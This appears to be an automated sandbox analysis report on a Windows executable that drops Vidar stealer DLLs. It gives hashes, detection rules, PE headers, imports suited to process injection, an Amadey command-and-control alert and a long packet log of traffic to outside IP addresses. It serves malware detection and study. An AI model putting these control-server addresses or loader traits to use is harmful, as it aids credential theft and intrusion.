                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..- ..~ ..~ ..~.f$~3..~.f&~...~.f'~>..~).Q~!..~.Z.~"..~....:..~.......~.......~).F~9..~ ..~...~....D..~..*~!..~....!..~Rich ..~........PE..L......d.................r..........=I............@.......................... ...........................................................H.......................;..@...8...........................x...@............................................text....p.......r.................. ..`.rdata...y.......z...v..............@..@.data...4]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..B................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):320000
                                                                                              Entropy (8bit):6.6675963898287085
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:Asf1jvN8Q2xaWEbescwLR17I4eDuUQEIGk9ZRDNZMpShgaW:AgW2h1lwIGkJDNSp
                                                                                              MD5:14F7F948561051323A5550BAB03B2515
                                                                                              SHA1:D7C6FBFDBFD6C95037810DB1558A0DAB3FDD61FF
                                                                                              SHA-256:34F29567CE5F19C9A4CC6752B1E7C6E56F04D4B4622E164181CBE7089B5543C4
                                                                                              SHA-512:5C6DC6658E06140861304EC4A8DBB1DAAEE50C0C39699651BE5C684BC0E9F89819472449ABE59F0FC27CF0CF54A9788199B5EB2C5093C8440F9BAD8FE9BCF9BD
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 52%
                                                                                              Reputation:low
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................8.z......|......H.0...a.....q..........I.....y...........Rich...........................PE..L...Q..e...........!.....t...........i.......................................P............@.............................B...4...P................................B...................................M..@............................................text... s.......t.................. ..`.rdata...............x..............@..@.data...dR...........r..............@....reloc..TS.......T..................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):320000
                                                                                              Entropy (8bit):6.6675963898287085
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:Asf1jvN8Q2xaWEbescwLR17I4eDuUQEIGk9ZRDNZMpShgaW:AgW2h1lwIGkJDNSp
                                                                                              MD5:14F7F948561051323A5550BAB03B2515
                                                                                              SHA1:D7C6FBFDBFD6C95037810DB1558A0DAB3FDD61FF
                                                                                              SHA-256:34F29567CE5F19C9A4CC6752B1E7C6E56F04D4B4622E164181CBE7089B5543C4
                                                                                              SHA-512:5C6DC6658E06140861304EC4A8DBB1DAAEE50C0C39699651BE5C684BC0E9F89819472449ABE59F0FC27CF0CF54A9788199B5EB2C5093C8440F9BAD8FE9BCF9BD
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 52%
                                                                                              Reputation:low
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................8.z......|......H.0...a.....q..........I.....y...........Rich...........................PE..L...Q..e...........!.....t...........i.......................................P............@.............................B...4...P................................B...................................M..@............................................text... s.......t.................. ..`.rdata...............x..............@..@.data...dR...........r..............@....reloc..TS.......T..................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                              Category:dropped
                                                                                              Size (bytes):1572864
                                                                                              Entropy (8bit):4.402184797918111
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:99pZG0ubj7ybGLGqoMK0UgAExAjeQGV1n1SYNnvRMkqGHrLTqqPGnj:PpZG0ubj7ybGLGLRj
                                                                                              MD5:DEDFD4DFCE90F534F572C29910C395CA
                                                                                              SHA1:4371FD53D7EEDFCD1FB3123489D4795FAE3181F0
                                                                                              SHA-256:48EC02D5D3A0885F0E83498B31FA4FDB8AC5DA1793AB0728AB7244EC0A81795C
                                                                                              SHA-512:7514334DBF257347F2055614C01C497B852321203FD1D12AF3540F688365F3B3C516729C9616BC5A60D11FCAE4C68B5B5625980E345668DEB12B22D99E737658
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:regf........p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):3.2185021074325637
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:YmZHaiLRftdgFfiYW9zoe0eqniPTDv6BHF7meaEKJ:HFLJpZokPUmi
                                                                                              MD5:8039252697DB910E6EF4D0BB7ED62B9F
                                                                                              SHA1:514B944CA2EA2C881172858673464F1BE8C9D537
                                                                                              SHA-256:F4603780AAFA437D6ECBEEFA294D3585A8532223F823CFB36B734C587F307242
                                                                                              SHA-512:49FFF434A1A45CEDE0ED72D24C9B60B70E2A0C0E255FBAFD5B1CD9E37346E82FFA6D7141069FD99E7829AC658069085F4DF222EADF946D63695B0C37554ED6D2
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:regf........p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.......................................................................................................................................................................................................................................................................................................................................................HvLE.^.......................q..zj..............@.......`........... ..hbin................p.\..,..........nk,.|.9N........P........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .|.9N........ ........................... .......Z.......................Root........lf......Root....nk .........................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.439668295542863
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:yaALNupJCH.exe
                                                                                              File size:224'256 bytes
                                                                                              MD5:b2ee13e6988e57f6731c20da3459c8dc
                                                                                              SHA1:3be7be70961a381c48d35ba7d37add07a3e477a3
                                                                                              SHA256:6cb42cc70376a4ba12627c2f6755d4235beffe85a6600dc91ffd7c22cb61df96
                                                                                              SHA512:792fb3ab1a5bff04602a575e94d4db9c2762dd98790a620ec6ecea9ba5a24ac61f6f84bafbf12e69581460d57ac4b49d31b4ba44653248ca6d1de0ada7a5ce42
                                                                                              SSDEEP:6144:dg2q9k0PPBFFRTvPcHb13OIX37ROpCvFc0u+VDVn67JS9K8:p6BvP613OIH7RlFhu+VDx7K8
                                                                                              TLSH:3C2419513952C072D560A1B619F5BFF2C19DA819ABB049EFAB804F77CA112F33D21E39
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o.................
                                                                                              Icon Hash:90cececece8e8eb0
                                                                                              Entrypoint:0x412af1
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x5C93143B [Thu Mar 21 04:34:03 2019 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:6
                                                                                              OS Version Minor:0
                                                                                              File Version Major:6
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:6
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:3865972614d44e518713c9a6183fed14
                                                                                              Instruction
                                                                                              call 00007FA614841E97h
                                                                                              jmp 00007FA614841889h
                                                                                              jmp 00007FA614845CFFh
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 00000324h
                                                                                              push ebx
                                                                                              push 00000017h
                                                                                              call 00007FA6148549D7h
                                                                                              test eax, eax
                                                                                              je 00007FA614841A17h
                                                                                              mov ecx, dword ptr [ebp+08h]
                                                                                              int 29h
                                                                                              push 00000003h
                                                                                              call 00007FA614841BBBh
                                                                                              mov dword ptr [esp], 000002CCh
                                                                                              lea eax, dword ptr [ebp-00000324h]
                                                                                              push 00000000h
                                                                                              push eax
                                                                                              call 00007FA61484248Fh
                                                                                              add esp, 0Ch
                                                                                              mov dword ptr [ebp-00000274h], eax
                                                                                              mov dword ptr [ebp-00000278h], ecx
                                                                                              mov dword ptr [ebp-0000027Ch], edx
                                                                                              mov dword ptr [ebp-00000280h], ebx
                                                                                              mov dword ptr [ebp-00000284h], esi
                                                                                              mov dword ptr [ebp-00000288h], edi
                                                                                              mov word ptr [ebp-0000025Ch], ss
                                                                                              mov word ptr [ebp-00000268h], cs
                                                                                              mov word ptr [ebp-0000028Ch], ds
                                                                                              mov word ptr [ebp-00000290h], es
                                                                                              mov word ptr [ebp-00000294h], fs
                                                                                              mov word ptr [ebp-00000298h], gs
                                                                                              pushfd
                                                                                              pop dword ptr [ebp-00000264h]
                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                              mov dword ptr [ebp-0000026Ch], eax
                                                                                              lea eax, dword ptr [ebp+04h]
                                                                                              mov dword ptr [ebp-00000260h], eax
                                                                                              mov dword ptr [ebp-00000324h], 00010001h
                                                                                              mov eax, dword ptr [eax-04h]
                                                                                              push 00000050h
                                                                                              mov dword ptr [ebp-00000270h], eax
                                                                                              lea eax, dword ptr [ebp-58h]
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x31c380x64.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000x1e0.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x370000x20ec.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x30ec00x70.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x30fd40x18.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x30f300x40.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x2a0000x204.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x28a8d0x28c00False0.46966665069018404data6.484521845042752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x2a0000x87e20x8800False0.47403492647058826data5.326563862346545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x330000x24c00x1800False0.08658854166666667data1.372411159115681IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x360000x1e00x200False0.52734375data4.7137725829467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x370000x20ec0x2200False0.7629825367647058data6.529600973386202IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                              uvhg0x3a0000x20000x1800False0.4466145833333333data5.128141149205521IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_MANIFEST0x360600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                              DLLImport
                                                                                              KERNEL32.dllCreateFileA, CloseHandle, GetSystemInfo, CreateThread, GetThreadContext, GetProcAddress, VirtualAllocEx, RemoveDirectoryA, GetFileAttributesA, CreateProcessA, CreateDirectoryA, SetThreadContext, WriteConsoleW, ReadConsoleW, SetEndOfFile, HeapReAlloc, HeapSize, GetLastError, CopyFileA, GetTempPathA, Sleep, GetModuleHandleA, SetCurrentDirectoryA, ResumeThread, GetComputerNameExW, GetVersionExW, CreateMutexA, VirtualAlloc, WriteFile, VirtualFree, WriteProcessMemory, GetModuleFileNameA, ReadProcessMemory, ReadFile, SetFilePointerEx, GetTimeZoneInformation, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetStringTypeW, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetStdHandle, GetFullPathNameW, GetCurrentDirectoryW, DeleteFileW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RaiseException, SetLastError, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetModuleFileNameW, GetStdHandle, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, MultiByteToWideChar, CompareStringW, LCMapStringW, DecodePointer
                                                                                              ADVAPI32.dllRegCloseKey, RegQueryValueExA, GetSidSubAuthorityCount, GetSidSubAuthority, GetUserNameA, LookupAccountNameA, RegSetValueExA, RegOpenKeyExA, GetSidIdentifierAuthority
                                                                                              SHELL32.dllShellExecuteA, SHGetFolderPathA
                                                                                              WININET.dllHttpOpenRequestA, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, InternetOpenW, InternetOpenUrlA
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States
                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              192.168.2.395.141.41.1249794802027700 09/28/23-06:01:52.097963TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.395.141.41.12
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Sep 28, 2023 06:01:51.903630018 CEST4979480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:52.097353935 CEST804979495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.097569942 CEST4979480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:52.097963095 CEST4979480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:52.296478987 CEST804979495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.305059910 CEST804979495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.305138111 CEST4979480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:01:52.634113073 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.814528942 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.814690113 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.814924002 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.995318890 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.995371103 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.995420933 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.995423079 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.995460987 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.995513916 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.995546103 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.995553017 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.995583057 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.995605946 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.995639086 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.995661974 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.995695114 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.995717049 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.995749950 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.995800018 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.995835066 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.995857000 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.995870113 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:52.995913982 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:52.995913982 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176090002 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176110983 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176130056 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176146984 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176166058 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176171064 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176186085 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176189899 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176204920 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176223040 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176233053 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176253080 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176269054 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176273108 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176312923 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176371098 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176412106 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176500082 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176537991 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176623106 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176667929 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176692009 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176706076 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176738024 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176740885 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176757097 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176778078 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176789045 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176815033 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176825047 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176836014 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176862955 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176873922 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176888943 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.176925898 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.176969051 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.177004099 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.356770992 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.356808901 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.356822014 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.356838942 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.356872082 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.356873035 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.356909990 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.356964111 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.356992960 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357011080 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357038975 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357088089 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357116938 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357156038 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357188940 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357208967 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357237101 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357300997 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357330084 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357397079 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357434034 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357492924 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357507944 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357522964 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357527971 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357542992 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357546091 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357566118 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357588053 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357634068 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357666969 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357676983 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357705116 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357789993 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357817888 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357875109 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357903004 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357913017 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.357939959 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.357988119 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358021021 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358025074 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358059883 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358103037 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358135939 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358179092 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358220100 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358247995 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358290911 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358334064 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358372927 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358388901 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358428001 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358443022 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358483076 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358485937 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358524084 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358565092 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358608961 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358683109 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358711004 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358724117 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358741045 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358791113 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358822107 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358829975 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358850956 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358890057 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.358918905 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.358995914 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.359024048 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.359065056 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.359102011 CEST4979680192.168.2.3157.90.36.211
                                                                                              Sep 28, 2023 06:01:53.359158993 CEST8049796157.90.36.211192.168.2.3
                                                                                              Sep 28, 2023 06:01:53.359200954 CEST4979680192.168.2.3157.90.36.211
